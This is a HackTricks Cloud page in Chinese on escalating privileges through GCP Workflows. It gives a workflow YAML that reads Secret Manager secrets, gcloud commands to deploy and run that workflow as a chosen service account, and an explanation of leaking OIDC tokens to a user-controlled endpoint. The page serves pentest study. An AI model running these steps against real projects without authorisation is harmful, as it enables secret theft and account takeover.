GCP - Workflows Privesc

学习和实践 AWS 黑客技术：HackTricks 培训 AWS 红队专家 (ARTE) 学习和实践 GCP 黑客技术：HackTricks 培训 GCP 红队专家 (GRTE)

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 Telegram 群组 或关注我们的 Twitter 🐦 @hacktricks_live.
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 分享黑客技巧。

Workflows

基本信息：

GCP - Workflows Enum

`workflows.workflows.create`, `iam.serviceAccounts.ActAs`, `workflows.executions.create`, (`workflows.workflows.get`, `workflows.operations.get`)

据我所知，无法通过访问包含与工作流关联的服务账户凭据的元数据端点来获取 shell。然而，可以通过在工作流中添加要执行的操作来滥用服务账户的权限。

可以找到连接器的文档。例如，这是 Secretmanager 连接器的页面. 在侧边栏中可以找到其他几个连接器。

在这里可以找到一个打印秘密的连接器示例：

main:
params: [input]
steps:
- access_string_secret:
call: googleapis.secretmanager.v1.projects.secrets.versions.accessString
args:
secret_id: secret_name
version: 1
project_id: project-id
result: str_secret
- returnOutput:
return: '${str_secret}'

从CLI更新：

gcloud workflows deploy <workflow-name> \
--service-account=email@SA \
--source=/path/to/config.yaml \
--location us-central1

如果您收到类似 ERROR: (gcloud.workflows.deploy) FAILED_PRECONDITION: Workflows service agent does not exist 的错误，请等待一分钟再试。

如果您没有网络访问权限，可以通过以下方式触发并查看工作流的执行：

# Run execution with output
gcloud workflows run <workflow-name> --location us-central1

# Run execution without output
gcloud workflows execute <workflow-name> --location us-central1

# List executions
gcloud workflows executions list <workflow-name>

# Get execution info and output
gcloud workflows executions describe projects/<proj-number>/locations/<location>/workflows/<workflow-name>/executions/<execution-id>

您还可以检查先前执行的输出以查找敏感信息

请注意，即使您收到类似 PERMISSION_DENIED: Permission 'workflows.operations.get' denied on... 的错误，因为您没有该权限，工作流仍然已生成。

泄露 OIDC 令牌（和 OAuth？）

根据文档，可以使用工作流步骤发送带有 OAuth 或 OIDC 令牌的 HTTP 请求。然而，就像在 Cloud Scheduler 的情况下，带有 Oauth 令牌的 HTTP 请求必须发送到主机 .googleapis.com。

因此，通过指示用户控制的 HTTP 端点泄露 OIDC 令牌是可能的，但要泄露 OAuth 令牌，您需要绕过该保护。然而，您仍然可以使用连接器或带有 OAuth 令牌的 HTTP 请求 联系任何 GCP API 以代表服务账户执行操作。

Oauth

- step_A:
call: http.post
args:
url: https://compute.googleapis.com/compute/v1/projects/myproject1234/zones/us-central1-b/instances/myvm001/stop
auth:
type: OAuth2
scopes: OAUTH_SCOPE

OIDC

- step_A:
call: http.get
args:
url: https://us-central1-project.cloudfunctions.net/functionA
query:
firstNumber: 4
secondNumber: 6
operation: sum
auth:
type: OIDC
audience: OIDC_AUDIENCE

`workflows.workflows.update` ...

使用此权限而不是 workflows.workflows.create，可以更新已存在的工作流并执行相同的攻击。

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousGCP - Storage Privesc NextGCP - Generic Permissions Privesc

Last updated 8 days ago